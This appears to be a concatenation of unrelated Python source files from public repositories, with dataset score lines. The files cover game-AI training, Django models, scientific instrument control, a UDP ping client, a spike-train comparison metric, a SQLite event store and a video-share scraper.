torch.from_numpy(step_terminals) def train(args): data_file = h5py.File(args.h5_path, 'r') screens = data_file['screens'] variables = data_file['variables'] labels = data_file['action_labels'] print('Dataset size =', len(screens)) action_sets = data_file['action_sets'][:] episodes = data_file['episodes'][:] input_shape = screens[0].shape train_generator = data_generator(args, screens, variables, labels, episodes, args.skiprate) np.save('action_set', action_sets) model = BaseModel(input_shape[0]*args.frame_num, len(action_sets), variables.shape[1], args.frame_num).to(device) if args.load is not None and os.path.isfile(args.load): print("loading model parameters {}".format(args.load)) source_model = torch.load(args.load) model.load_state_dict(source_model.state_dict()) del source_model criterion = nn.CrossEntropyLoss() optimizer = optim.AdamW(model.parameters(), lr=5e-4) optimizer.zero_grad() running_loss = 0 running_accuracy = 0 batch_time = time.time() for batch, (screens, variables, labels, terminals) in enumerate(train_generator): labels = labels.to(device) outputs, _ = model(*model.transform_input(screens, variables)) loss = criterion(outputs, labels) model.set_terminal(terminals) running_loss += loss.item() _, pred = outputs.max(1) accuracy = (pred == labels).float().mean() running_accuracy += accuracy loss.backward() optimizer.step() optimizer.zero_grad() if batch % args.episode_length == args.episode_length - 1: running_loss /= args.episode_length running_accuracy /= args.episode_length print( '[{:d}] loss: {:.3f}, accuracy: {:.3f}, time: {:.6f}'.format( batch + 1, running_loss, running_accuracy, time.time()-batch_time ) ) running_loss = 0 running_accuracy = 0 batch_time = time.time() if batch % args.checkpoint_rate == args.checkpoint_rate - 1: torch.save(model, args.checkpoint_file) if __name__ == '__main__': parser = argparse.ArgumentParser(description='Doom Recorder') parser.add_argument('--episode_size', type=int, default=20, help='number of steps in an episode') parser.add_argument('--batch_size', type=int, default=64, help='number of game instances running in parallel') parser.add_argument('--load', default=None, help='path to model file') parser.add_argument('--h5_path', default=os.path.expanduser('~') + '/test/datasets/vizdoom/cig_map01/flat.h5', help='hd5 file path') parser.add_argument('--skiprate', type=int, default=2, help='number of skipped frames') parser.add_argument('--episode_length', type=int, default=30, help='episode length') parser.add_argument('--frame_num', type=int, default=4, help='number of frames per input') parser.add_argument('--checkpoint_file', default=None, help='check point file name') parser.add_argument('--checkpoint_rate', type=int, default=5000, help='number of batches per checkpoit') args = parser.parse_args() train(args)
2.21875
2
examples/prompts/auto-completion/multi-column-autocompletion-with-meta.py
scalabli/quo
3
12747563
#!/usr/bin/env python """ Autocompletion example that shows meta-information alongside the completions. """ from quo.completion import WordCompleter from quo.prompt import Prompt animal_completer = WordCompleter( [ "alligator", "ant", "ape", "bat", "bear", "beaver", "bee", "bison", "butterfly", "cat", "chicken", "crocodile", "dinosaur", "dog", "dolphin", "dove", "duck", "eagle", "elephant", ], meta_dict={ "alligator": "An alligator is a crocodilian in the genus Alligator of the family Alligatoridae.", "ant": "Ants are eusocial insects of the family Formicidae", "ape": "Apes (Hominoidea) are a branch of Old World tailless anthropoid catarrhine primates ", "bat": "Bats are mammals of the order Chiroptera", } ) session = Prompt( completer=animal_completer, complete_style="multi_column" ) def main(): text = session.prompt("Give some animals: ") print("You said: %s" % text) if __name__ == "__main__": main()
2.40625
2
Binary Search/leetcode744. Find Smallest Letter Greater Than Target.py
aurora314156/leetcode
0
12747691
class Solution: def nextGreatestLetter(self, letters: List[str], target: str) -> str: if target >= letters[-1]: return letters[0] left, right = 0, len(letters) while left < right: mid = left + (right - left) // 2 if letters[mid] <= target: left = mid + 1 else: right = mid return letters[left]
2.296875
2
addresses/models.py
CzechInvest/ciis
1
12747819
<filename>addresses/models.py<gh_stars>1-10 from django.db import models from django.contrib.gis.db import models as gis_models import json # Create your models here. class Address(models.Model): adm = models.IntegerField( help_text='Kód ADM', primary_key=True) street = models.CharField( max_length = 200, help_text = "Ulice") house_number = models.CharField( max_length = 20, default=None, null=True, help_text = "Domovní číslo") orientation_number = models.CharField( max_length = 20, default=None, null=True, help_text = "Orientační číslo") city = models.ForeignKey("City", on_delete=models.CASCADE) zipcode = models.CharField( max_length = 200, help_text = "PSČ") coordinates = gis_models.PointField( null=True) @property def number(self): slash = "" if self.orientation_number: slash = "/" return "{}{}{}".format( self.house_number, slash, self.orientation_number ) def __str__(self): if self.street: street = self.street else: street = self.city return "{}, {}, {} - {}".format(street, self.number, self.zipcode, self.city) @property def json(self): return { "adm": self.adm, "street": self.street, "house_number": self.house_number, "orientation_number": self.orientation_number, "city": self.city.name, "zipcode": self.zipcode, "coordinates": json.loads(self.coordinates.json) } class City(models.Model): code = models.IntegerField( unique=True, primary_key=True) name = models.CharField( max_length = 200, help_text = "Obec") def __str__(self): return self.name
1.710938
2
songs/migrations/0004_auto_20200212_1404.py
cr0manty/Fox_Project
0
12747947
# Generated by Django 2.2.7 on 2020-02-12 12:04 from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ ('songs', '0003_auto_20200107_0103'), ] operations = [ migrations.AlterField( model_name='song', name='artist', field=models.CharField(blank=True, max_length=255, null=True), ), migrations.AlterField( model_name='song', name='name', field=models.CharField(blank=True, max_length=255, null=True), ), migrations.AlterField( model_name='song', name='song_id', field=models.IntegerField(unique=True), ), ]
0.832031
1
nicos_sinq/amor/devices/slit.py
ebadkamil/nicos
12
12748075
# -*- coding: utf-8 -*- # ***************************************************************************** # NICOS, the Networked Instrument Control System of the MLZ # Copyright (c) 2009-2021 by the NICOS contributors (see AUTHORS) # # This program is free software; you can redistribute it and/or modify it under # the terms of the GNU General Public License as published by the Free Software # Foundation; either version 2 of the License, or (at your option) any later # version. # # This program is distributed in the hope that it will be useful, but WITHOUT # ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS # FOR A PARTICULAR PURPOSE. See the GNU General Public License for more # details. # # You should have received a copy of the GNU General Public License along with # this program; if not, write to the Free Software Foundation, Inc., # 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA # # Module authors: # <NAME> <<EMAIL>> # <NAME> <<EMAIL>> # # ***************************************************************************** """Slit devices in AMOR""" from numpy import arctan, radians, tan from nicos.core import Attach, HasPrecision, Override, Param, Readable, \ dictwith, oneof, status from nicos.core.utils import multiStatus from nicos.devices.generic.slit import Slit, SlitAxis from nicos_sinq.amor.devices.logical_motor import AmorLogicalMotor, \ InterfaceLogicalMotorHandler class SlitOpening(HasPrecision, SlitAxis): """Device to control the slit opening/height. Motor dXt changes moves the slit's top slab in turn changing the slit opening. Motor dXb changes the position of the whole slit moving it up or down (X is the slit number). This device reads the current opening using the motor dXt and changes the opening using combination of the motors dXt and dXb such that the center remains aligned. """ parameter_overrides = { 'unit': Override(mandatory=False, default='mm'), 'fmtstr': Override(userparam=False), 'maxage': Override(userparam=False), 'pollinterval': Override(userparam=False), 'warnlimits': Override(userparam=False), 'precision': Override(userparam=False, default=0.01), 'target': Override(volatile=True) } status_to_msg = { status.ERROR: 'Error in %s', status.BUSY: 'Moving: %s ...', status.WARN: 'Warning in %s', status.NOTREACHED: '%s did not reach target!', status.UNKNOWN: 'Unknown status in %s!', status.OK: 'Ready.' } def doReadTarget(self): # Do not allow None as target target = self._getFromCache('target', self.doRead) return target if target is not None else self.doRead(0) def _convertRead(self, positions): return positions[3] def _convertStart(self, target, current): current_opening = current[3] current_bottom = current[2] new_bottom = current_bottom + 0.5 * (current_opening - target) return current[0], current[1], new_bottom, target def doStatus(self, maxage=0): # Check for error and warning in the dependent devices st_devs = multiStatus(self._adevs, maxage) devs = [dname for dname, d in self._adevs.items() if d.status()[0] == st_devs[0]] if st_devs[0] in self.status_to_msg: msg = self.status_to_msg[st_devs[0]] if '%' in msg: msg = msg % ', '.join(devs) return st_devs[0], msg return st_devs def read_divergence(xs, slit): left, _, bottom, top = slit s = arctan(top/xs) d = arctan(bottom/xs) return s+d, 2*arctan(left/xs), (s-d)/2 def read_beam_shaping(slit): left, right, bottom, top = slit return top+bottom, right+left, (top-bottom)/2 class AmorSlitHandler(InterfaceLogicalMotorHandler): attached_devices = { 'xs': Attach('Sample x position', Readable, missingok=True, optional=True), 'mu': Attach('Sample omega', Readable, missingok=True, optional=True), 'nu': Attach('Sample omega', Readable, missingok=True, optional=True), 'ltz': Attach('Sample x position', Readable, missingok=True, optional=True), 'xd2': Attach('Sample x position', Readable, missingok=True, optional=True), 'xl': Attach('Deflector x position', Readable, missingok=True, optional=True), 'mu_offset': Attach('Sample x position', Readable, missingok=True, optional=True), 'kappa': Attach('Inclination of the beam after the Selene guide', Readable, missingok=True, optional=True), 'soz_ideal': Attach('Ideal sample omega', Readable, missingok=True, optional=True), 'xd3': Attach('', Readable, missingok=True, optional=True), 'slit1': Attach('slit 1', Slit, missingok=True, optional=True), 'slit2': Attach('slit 2', Slit, missingok=True, optional=True), 'slit2z': Attach('Z motor for slit 2', Readable, missingok=True, optional=True), 'slit3': Attach('slit 3', Slit, missingok=True, optional=True), 'slit3z': Attach('Z motor for slit 3', Readable, missingok=True, optional=True), } def doPreinit(self, mode): self._status_devs = ['slit1', 'slit2', 'slit2z', 'slit3', 'slit3z'] InterfaceLogicalMotorHandler.doPreinit(self, mode) self.valuetype = dictwith(div=float, did=float, dih=float) def doRead(self, maxage=0): result = {} if self._is_active('diaphragm1'): v, h, d = read_divergence(self._read_dev('xs'), self._read_dev('slit1')) result.update({'div': v, 'dih': h, 'did': d}) if self._is_active('diaphragm2'): v, h, d = read_beam_shaping(self._read_dev('slit2')) result.update({'d2v': v, 'd2h': h, 'd2d': d}) if self._is_active('diaphragm3'): v, h, d = read_beam_shaping(self._read_dev('slit3')) result.update({'d3v': v, 'd3h': h, 'd3d': d}) return result def _get_move_list(self, targets): positions = [] if self._is_active('diaphragm1'): xs = self._read_dev('xs') div = targets.get('div') or self._read_dev('div') did = targets.get('did') or self._read_dev('did') dih = targets.get('dih') or self._read_dev('dih') top = xs * tan(radians(div / 2 + did)) bottom = xs * tan(radians(div / 2 - did)) horizontal = xs * tan(radians(dih / 2)) positions.extend([(self._get_dev('slit1'), (top, bottom, horizontal, horizontal)) ]) if self._is_active('diaphragm2'): v = targets.get('d2v') d = targets.get('d2d') h = targets.get('d2h') ltz = self._read_dev('ltz') xd2 = self._read_dev('xd2') xl = self._read_dev('xl') mu_offset = self._read_dev('mu_offset') kappa = self._read_dev('kappa') if self._is_active('deflector'): z = ltz - (xd2 - xl) * tan(radians(self._read_dev('mu') + mu_offset)) else: z = xd2 * tan(radians(kappa)) top = 0.5 * (v + d) bottom = 0.5 * (v - d) horizontal = 0.5 * h positions.extend([(self._get_dev('slit2z'), z), (self._get_dev('slit2'), (top, bottom, horizontal, horizontal)) ]) if self._is_active('diaphragm3'): soz_ideal = self._read_dev('soz_ideal') xd3 = self._read_dev('xd3') nu = self._read_dev('nu') xs = self._read_dev('xs') kappa = self._read_dev('kappa') v = targets.get('d3v') d = targets.get('d3d') h = targets.get('d3h') z = soz_ideal + (xd3 - xs) * tan(radians(nu + kappa)) top = 0.5 * (v + d) bottom = 0.5 * (v - d) horizontal = 0.5 * h positions.extend([(self._get_dev('slit2z'), z), (self._get_dev('slit2'), (top, bottom, horizontal, horizontal)) ]) return positions motortypes = ['div', 'dih', 'did', 'd2v', 'd2h', 'd2d', 'd3v', 'd3h', 'd3d'] class AmorSlitLogicalMotor(AmorLogicalMotor): """ Class to represent the logical slit motors in AMOR. """ parameters = { 'motortype': Param('Type of motor %s' % ','.join(motortypes), type=oneof(*motortypes), mandatory=True), } parameter_overrides = { 'unit': Override(mandatory=False, default='degree'), 'target': Override(volatile=True), 'abslimits': Override(mandatory=False, default=(-3.0, 3.0)), 'userlimits': Override(mandatory=False, default=(-3.0, 3.0)) } attached_devices = { 'controller': Attach('Controller for the logical motors', AmorSlitHandler) } def doRead(self, maxage=0): return self._attached_controller.doRead(maxage)
1.390625
1
Codes/Python32/Lib/distutils/tests/test_filelist.py
eyantra/FireBird_Swiss_Knife
4
12748203
"""Tests for distutils.filelist.""" import unittest from distutils.filelist import glob_to_re, FileList from test.support import captured_stdout, run_unittest from distutils import debug class FileListTestCase(unittest.TestCase): def test_glob_to_re(self): # simple cases self.assertEqual(glob_to_re('foo*'), 'foo[^/]*\\Z(?ms)') self.assertEqual(glob_to_re('foo?'), 'foo[^/]\\Z(?ms)') self.assertEqual(glob_to_re('foo??'), 'foo[^/][^/]\\Z(?ms)') # special cases self.assertEqual(glob_to_re(r'foo\\*'), r'foo\\\\[^/]*\Z(?ms)') self.assertEqual(glob_to_re(r'foo\\\*'), r'foo\\\\\\[^/]*\Z(?ms)') self.assertEqual(glob_to_re('foo????'), r'foo[^/][^/][^/][^/]\Z(?ms)') self.assertEqual(glob_to_re(r'foo\\??'), r'foo\\\\[^/][^/]\Z(?ms)') def test_debug_print(self): file_list = FileList() with captured_stdout() as stdout: file_list.debug_print('xxx') stdout.seek(0) self.assertEqual(stdout.read(), '') debug.DEBUG = True try: with captured_stdout() as stdout: file_list.debug_print('xxx') stdout.seek(0) self.assertEqual(stdout.read(), 'xxx\n') finally: debug.DEBUG = False def test_suite(): return unittest.makeSuite(FileListTestCase) if __name__ == "__main__": run_unittest(test_suite())
1.882813
2
utilities/exclude/open3d_utilities.py
bootml/agent
0
12748331
<reponame>bootml/agent import numpy as np import open3d if __name__ == "__main__": print("Load a ply point cloud, print it, and render it") pcd = open3d.read_point_cloud('/home/heider/Datasets/pointclouds/office.ply') print(pcd) print(np.asarray(pcd.points)) # open3d.draw_geometries([pcd]) print("Downsample the point cloud with a voxel of 0.05") downsampled = open3d.voxel_down_sample(pcd, voxel_size=0.1) # open3d.draw_geometries([downpcd]) print("Recompute the normal of the downsampled point cloud") open3d.estimate_normals(downsampled, search_param=open3d.KDTreeSearchParamHybrid( radius=0.1, max_nn=30)) open3d.draw_geometries([downsampled])
1.585938
2
api/resources_portal/models/associations/grant_material_association.py
AlexsLemonade/resources-portal
0
12748459
<reponame>AlexsLemonade/resources-portal from django.db import models from resources_portal.models.grant import Grant from resources_portal.models.material import Material class GrantMaterialAssociation(models.Model): grant = models.ForeignKey(Grant, blank=False, null=False, on_delete=models.CASCADE) material = models.ForeignKey(Material, blank=False, null=False, on_delete=models.CASCADE) created_at = models.DateTimeField(auto_now_add=True) class Meta: db_table = "grant_material_associations" unique_together = ("grant", "material")
1.117188
1
furion/ping.py
keli/furion
32
12748587
import math import time import logging import socket import select try: import socketserver except ImportError: import SocketServer as socketserver def ping(addr, count=20, timeout=1): """UDP ping client""" # print "--- PING %s:%d ---" % addr results = [] sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) for i in range(count): ts = time.time() data = 'PING %d %f %s' % (i, ts, '#' * 480) data = data.encode('utf-8') sock.sendto(data, addr) readables, writeables, exceptions = select.select( [sock], [], [], timeout) # exception if exceptions: time.sleep(1) continue # timeout if (readables, writeables, exceptions) == ([], [], []): continue if readables: ret = readables[0].recv(512) if ret == data: time_spent = (time.time() - ts) * 1000 results.append(time_spent) # print '%d bytes from %s:%d, seq=%d time=%.3f ms' % (len(data), addr[0], addr[1], i, time_spent) received = len(results) missing = count - received loss = count - received # print "--- %s:%d ping statistics---" % addr # print "%d packets transmitted, %d packets received, %.1f%% packet loss" % (count, received, float(loss)*100/count) logging.debug("ping %s result: %d transmitted, %d received, %.1f%% loss", addr, count, received, float(loss) * 100 // count) if received != 0: min_val = min(results) max_val = max(results) avg = sum(results) // count stddev = math.sqrt(sum([(x - avg) ** 2 for x in results]) // received) # print "round-trip min/avg/max/stddev = %.3f/%.3f/%.3f/%.3f" % (min_val, avg, max_val, stddev) logging.debug("ping %s min/avg/max/stddev = %.3f/%.3f/%.3f/%.3f", addr, min_val, avg, max_val, stddev) return missing * 500 + avg else: return float("inf") class PingHandler(socketserver.BaseRequestHandler): """UDP Ping server handler""" def handle(self): data = self.request[0].strip() sock = self.request[1] sock.sendto(data, self.client_address) # print data # Test client # import threading # for x in range(10): # threading.Thread(target = ping, args = (('172.16.31.10', 8888),)).start()
2.015625
2
src/SpikeTrainComparator.py
apayeur/GIF-K
1
12748715
<reponame>apayeur/GIF-K<filename>src/SpikeTrainComparator.py import matplotlib.pyplot as plt import numpy as np from scipy.signal import fftconvolve class SpikeTrainComparator : """ This class contains experimental and predicted spike trains. Use this class to visualize and quantify the Md similarity metrix between data and model prediction. To use the Kistler coincidence widnow K(s,s',D)=rect(s/D)*delta(s') call the function computeMD_Kistler(self, delta, dt) To use the double rectangular coincidence window K(s,s',D)=rect(s/D)*rect(s'/D) call the function computeMD_Rect(self, delta, dt) """ def __init__(self, T, spks_data, spks_model): self.T = T # ms, duration of spike-trains self.spks_data = spks_data # a small set of spike-trains (in ms) self.spks_model = spks_model # a large set of spike-trains (in ms) def getAverageFiringRate(self): spks_cnt_data = 0 for s in self.spks_data : spks_cnt_data += len(s) rate_data = float(spks_cnt_data)/(self.T/1000.0)/len(self.spks_data) spks_cnt_model = 0 for s in self.spks_model : spks_cnt_model += len(s) rate_model = float(spks_cnt_model)/(self.T/1000.0)/len(self.spks_model) return (rate_data, rate_model) ######################################################################### # MD KISTLER WINDOW ######################################################################### def computeMD_Kistler(self, delta, dt) : print "Computing Md* - Kistler window (%0.1f ms precision)..." % (delta) KistlerDotProduct = SpikeTrainComparator.Md_dotProduct_Kistler KistlerDotProduct_args = {'delta' : delta } return self.computeMD(KistlerDotProduct, KistlerDotProduct_args, dt) @classmethod def Md_dotProduct_Kistler(cls, s1_train, s2_train, args, dt): delta = args['delta'] rect_size_i = 2*int(float(delta)/dt) rect = np.ones(rect_size_i) s1_filtered = fftconvolve(s1_train, rect, mode='same') dotProduct = np.sum(s1_filtered*s2_train) return dotProduct ######################################################################### # MD RECT*RECT WINDOW ######################################################################### def computeMD_Rect(self, delta, dt) : print "Computing Md* - Rectangular window (%0.1f ms precision)..." % (delta) RectDotProduct = SpikeTrainComparator.Md_dotProduct_Rect RectDotProduct_args = {'delta' : delta } return self.computeMD(RectDotProduct, RectDotProduct_args, dt) @classmethod def Md_dotProduct_Rect(cls, s1_train, s2_train, args, dt=0.1): delta = args['delta'] rect_size_i = 2*int(float(delta)/dt) rect = np.ones(rect_size_i) s1_filtered = fftconvolve(s1_train, rect, mode='same') s2_filtered = fftconvolve(s2_train, rect, mode='same') dotProduct = np.sum(s1_filtered*s2_filtered) return dotProduct def computeMD(self, dotProduct, dotProductArgs, dt) : T = self.T # Compute experimental spike trains (given spike times) all_spike_train_data = [] all_spike_train_data_nb = len(self.spks_data) for s in self.spks_data : spike_train_tmp = SpikeTrainComparator.getSpikeTrain(s, T, dt) all_spike_train_data.append(spike_train_tmp) # Compute average spike-strain for both sets spiketrain_data_avg = SpikeTrainComparator.getAverageSpikeTrain(self.spks_data, T, dt) spiketrain_model_avg = SpikeTrainComparator.getAverageSpikeTrain(self.spks_model, T, dt) # Compute dot product <data, model> #dotproduct_dm = SpikeTrainComparator.Md_dotProduct_Kistler(spiketrain_data_avg, spiketrain_model_avg, delta, dt) dotproduct_dm = dotProduct(spiketrain_data_avg, spiketrain_model_avg, dotProductArgs, dt=dt) # Compute dot product <model, model> #dotproduct_mm = SpikeTrainComparator.Md_dotProduct_Kistler(spiketrain_model_avg, spiketrain_model_avg, delta, dt) dotproduct_mm = dotProduct(spiketrain_model_avg, spiketrain_model_avg, dotProductArgs, dt=dt) # Compute dot product <data, data> using unbiased method tmp = 0 for i in range(all_spike_train_data_nb) : for j in range(i+1, all_spike_train_data_nb) : tmp += dotProduct(all_spike_train_data[i], all_spike_train_data[j], dotProductArgs, dt=dt) dotproduct_dd_unbaiased = tmp/ (all_spike_train_data_nb*(all_spike_train_data_nb-1)/2.0) MDstar = 2.0*dotproduct_dm / (dotproduct_dd_unbaiased + dotproduct_mm) print "Md* = %0.4f" % (MDstar) return MDstar @classmethod def getSpikeTrain(cls, s, T, dt): """ Given spike times in s, build a spike train of duration T (in ms) and with a resolution of dt. """ T_i = int(T/dt) s_i = np.array(s, dtype='double') s_i = s_i/dt s_i = np.array(s_i, dtype='int') spike_train = np.zeros(T_i) spike_train[s_i] = 1.0 return np.array(spike_train) @classmethod def getAverageSpikeTrain(cls, all_s, T, dt): """ Given set of spike trains s (defined as list of spike times), build the mean spike train vector of duration T (in ms) and with a resolution of dt. """ T_i = int(T/dt) average_spike_train = np.zeros(T_i) nbSpikeTrains = len(all_s) for s in all_s : s_i = np.array(s, dtype='double') s_i = s_i/dt s_i = np.array(s_i, dtype='int') average_spike_train[s_i] += 1.0 average_spike_train = average_spike_train / float(nbSpikeTrains) return np.array(average_spike_train) ####################################################################### # FUNCTIONS FOR PLOTTING ####################################################################### def plotRaster(self, fname, delta=10.0, dt=0.1): plt.figure(facecolor='white', figsize=(14,4)) # Plot raster plt.subplot(2,1,1) nb_rep = min(len(self.spks_data), len(self.spks_model) ) cnt = 0 for spks in self.spks_data[:nb_rep] : cnt -= 1 plt.plot(spks, cnt*np.ones(len(spks)), '|', color='black', ms=5, mew=2) for spks in self.spks_model[:nb_rep] : cnt -= 1 plt.plot(spks, cnt*np.ones(len(spks)), '|', color='red', ms=5, mew=2) plt.ylabel('Neuron #') plt.ylim(cnt - 0.1, 0.1) plt.yticks([]) # Plot PSTH plt.subplot(2,1,2) rect_width = delta rect_size_i = int(float(rect_width)/dt) rect_window = np.ones(rect_size_i)/(rect_width/1000.0) spks_avg_data = SpikeTrainComparator.getAverageSpikeTrain(self.spks_data, self.T, dt) spks_avg_data_support = np.arange(len(spks_avg_data))*dt spks_avg_data_smooth = fftconvolve(spks_avg_data, rect_window, mode='same') spks_avg_model = SpikeTrainComparator.getAverageSpikeTrain(self.spks_model, self.T, dt) spks_avg_model_support = np.arange(len(spks_avg_data))*dt spks_avg_model_smooth = fftconvolve(spks_avg_model, rect_window, mode='same') plt.plot(spks_avg_data_support, spks_avg_data_smooth, 'black', label='Data') plt.plot(spks_avg_model_support, spks_avg_model_smooth, 'red', label='Model') plt.legend() plt.xlabel("Time (ms)") plt.ylabel('PSTH (Hz)') plt.tight_layout() plt.savefig(fname, format='png') # Compute % of variance explained SSE = np.mean( (spks_avg_data_smooth-spks_avg_model_smooth)**2 ) VAR = np.var(spks_avg_data_smooth) pct_variance_explained = (1.0 - SSE/VAR)*100.0 return float(pct_variance_explained) print "Percentage of variance explained: %0.1f" % (pct_variance_explained) #plt.show()
2.421875
2
scripts/hbase-config-overrides.py
Lnk2past/magi-utils
0
12748843
#!/usr/bin/env python3 from os import environ from common.helpers import read_xml, overwrite_file from hdfs.helpers import process if __name__ == '__main__': conf_dir = environ.get( "CONF_DIR" ) if environ.get( "CONF_DIR" ) else "/opt/hbase/conf" filename = "hbase-site.xml" print( f"using configuration: {conf_dir}/{filename}" ) xml = read_xml( conf_dir, filename ) processed_core_site = process( xml ) if processed_core_site is not None: overwrite_file( conf_dir, filename, processed_core_site ) else: print( f"using default {filename} from docker images" ) print( "to learn more about the HDFS configs please visit the GitHub repo: https://github.com/magi-platform/magi" )
1.429688
1
examples/transmitter/swagger_server/db.py
duo-labs/sharedsignals
12
12748971
# Copyright (c) 2021 Cisco Systems, Inc. and its affiliates # All rights reserved. # Use of this source code is governed by a BSD 3-Clause License # that can be found in the LICENSE file. from typing import Any, Dict import contextlib import json import logging import os from pathlib import Path import sqlite3 from typing import Any, Dict, List, Optional, Union from swagger_server.events import SecurityEvent from swagger_server.encoder import JSONEncoder from swagger_server.errors import StreamDoesNotExist, SubjectNotInStream from swagger_server.models import Status CREATE_STREAMS_SQL = """ CREATE TABLE IF NOT EXISTS streams ( client_id TEXT PRIMARY KEY, stream_data TEXT ) """ CREATE_SUBJECTS_SQL = """ CREATE TABLE IF NOT EXISTS subjects ( client_id TEXT, email TEXT, status TEXT, FOREIGN KEY(client_id) REFERENCES streams(client_id), PRIMARY KEY(client_id, email) ) """ CREATE_SETS_SQL = """ CREATE TABLE IF NOT EXISTS SETs ( client_id TEXT NOT NULL, jti TEXT NOT NULL, timestamp INTEGER NOT NULL, event TEXT NOT NULL, FOREIGN KEY(client_id) REFERENCES streams(client_id), PRIMARY KEY(client_id, jti) ) """ @contextlib.contextmanager def connection() -> sqlite3.Connection: """Yield a connection that is guaranteed to close""" db_path = os.environ["DB_PATH"] conn = sqlite3.connect(db_path) conn.row_factory = sqlite3.Row try: yield conn finally: conn.close() def create(drop=False): if drop: logging.warning("Dropping database") db_path = Path(os.environ["DB_PATH"]) db_path.unlink(missing_ok=True) logging.info("Creating database") with connection() as conn: with conn: conn.execute(CREATE_STREAMS_SQL) conn.execute(CREATE_SUBJECTS_SQL) conn.execute(CREATE_SETS_SQL) def stream_exists(client_id: str) -> bool: """Get a client_id info based on a token""" with connection() as conn: row = conn.execute( "SELECT * FROM streams WHERE client_id=?", (client_id,) ).fetchone() return row is not None def save_stream(client_id: str, stream_data: str) -> None: """Saves a stream (minus subjects and events) to the db""" with connection() as conn: # open a transaction and commit if successful with conn: conn.execute( "REPLACE INTO streams VALUES (?, ?)", (client_id, stream_data) ) def load_stream(client_id: str) -> Dict[str, Any]: """Load the data needed to create a stream from the database""" with connection() as conn: row = conn.execute( "SELECT * FROM streams WHERE client_id=?", (client_id,) ).fetchone() if row: return json.loads(row["stream_data"]) else: raise StreamDoesNotExist() def get_stream_ids() -> List[str]: """Load the client id for all streams""" with connection() as conn: rows = conn.execute("SELECT client_id from streams").fetchall() return [row["client_id"] for row in rows] def add_subject(client_id: str, email: str) -> None: """Add a subject to a stream""" with connection() as conn: with conn: conn.execute( "INSERT INTO subjects VALUES (?, ?, ?)", (client_id, email, Status.enabled.value) ) def set_subject_status(client_id: str, email: str, status: Status) -> None: """Set a subject's status""" with connection() as conn: with conn: conn.execute(""" UPDATE subjects SET status = ? WHERE client_id = ? AND email = ? """, (status.value, client_id, email) ) if conn.total_changes != 1: raise SubjectNotInStream(email) def get_subject_status(client_id: str, email: str) -> Status: """Get a subject's status""" with connection() as conn: row = conn.execute( "SELECT * FROM subjects WHERE client_id=? AND email=?", (client_id, email) ).fetchone() if row: return Status(row["status"]) else: raise SubjectNotInStream(email) def remove_subject(client_id: str, email: str) -> None: """Remove a subject from a stream""" with connection() as conn: with conn: conn.execute( "DELETE FROM subjects WHERE client_id=? AND email=?", (client_id, email) ) def delete_subjects(client_id: str) -> None: """Delete all subjects for a stream""" with connection() as conn: with conn: conn.execute( "DELETE FROM subjects WHERE client_id=?", (client_id,) ) def add_set(client_id: str, SET: SecurityEvent) -> None: """Add a SET to the stream""" with connection() as conn: with conn: conn.execute( "INSERT INTO SETs VALUES (?, ?, ?, ?)", (client_id, SET.jti, SET.iat, JSONEncoder().encode(SET)) ) def delete_SETs(client_id: str, jtis: Optional[List[str]] = None) -> None: """Delete SETs from the stream, based on their jtis""" sql = "DELETE FROM SETs WHERE client_id=?" if jtis: qmarks = ",".join(["?"] * len(jtis)) sql += f" AND jti IN ({qmarks})" with connection() as conn: with conn: conn.execute(sql, (client_id, *jtis) if jtis else (client_id, )) def count_SETs(client_id: str) -> int: """How many SETs are in the stream?""" with connection() as conn: return conn.execute( "SELECT COUNT(*) FROM SETs WHERE client_id = ?", (client_id,) ).fetchone()[0] def get_SETs(client_id: str, max_events: Optional[int] = None) -> List[SecurityEvent]: """Get up to max_events SETs from the stream""" if max_events is not None and max_events <= 0: return [] sql = "SELECT * FROM SETs WHERE client_id=? ORDER BY timestamp" if max_events is not None: sql += f" LIMIT {max_events}" with connection() as conn: results = conn.execute(sql, (client_id, )).fetchall() return [ SecurityEvent.parse_obj(json.loads(r["event"])) for r in results ]
1.59375
2
app/src/main/python/bixin.py
One-PZ/lmgp
0
12749099
# -*- coding:utf-8 -*- import re import json import requests """ 目标APP:比心陪练APP 目标url:APP短视频分享链接 爬取思路: 1. 通过APP里的分享获取视频url,获取其timelineId 2. 对https://h5.hibixin.com/capi/bixin/timeline/shareTimeline发送post请求,获取json数据 """ class BiXin(object): def __init__(self, url): self.url = url self.session = requests.Session() def get_video(self): headers = { "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.125 Safari/537.36", "Host": "h5.hibixin.com", "Origin": "https://h5.hibixin.com", "Content-Type": "application/json" } pattern = re.compile("dynamic_id=(\w+)", re.S) dynamic_id = re.findall(pattern, str(self.url).strip())[0] try: # 用户的单个视频 base_url = "https://h5.hibixin.com/capi/bixin/timeline/shareTimeline" data = { "timelineId": dynamic_id } response = self.session.post(url=base_url, headers=headers, data=json.dumps(data), timeout=10) if response.status_code == 200: doc = response.json() title = doc["result"]["timelineInfo"]["content"] cover = doc["result"]["timelineInfo"]["videoInfoDTO"]["videoFirstImg"] video = doc["result"]["timelineInfo"]["videoInfoDTO"]["videoUrl"] info = { "title": title, "cover": cover, "video": video } return json.dumps(info, ensure_ascii=False) else: return json.dumps({"info": "暂无相关数据,请检查相关数据:"}, ensure_ascii=False) except Exception as e: return json.dumps({"info": "暂无相关数据,请检查相关数据:" + str(e)}, ensure_ascii=False) if __name__ == '__main__': bi_xin = BiXin("https://h5.hibixin.com/bixin/web-share/index?refer_page=ExploreDynamicDetailPage" "&refer_share_channel=qqFriends#/?dynamic_id=1011146143398583404") print(bi_xin.get_video())
1.59375
2
tests/test_system_storable_list.py
fatz/dcos_migrate
0
12749227
from dcos_migrate.system import StorableList, Backup def create_example_list(dir: str) -> StorableList: list = StorableList(str(dir)) p = "testPlugin" b = "foobar" d = {"foo": "bar"} list.append(Backup(pluginName=p, backupName=b, data=d)) list.store() return list, p, b, d def test_store(tmpdir): dir = tmpdir.mkdir("test") list, p, b, d = create_example_list(str(dir)) assert len(dir.listdir()) == 1 assert dir.dirpath("test/{}/{}.Backup.json".format(p, b)).check() def test_load(tmpdir): dir = tmpdir.mkdir("test") list, p, b, d = create_example_list(str(dir)) list2 = StorableList(str(dir)).load() # we expect different objects assert list != list2 # but the same amount assert len(list) == len(list2) # and data assert list[0].data == list2[0].data
1.796875
2
src/backupSwitchDatacom.py
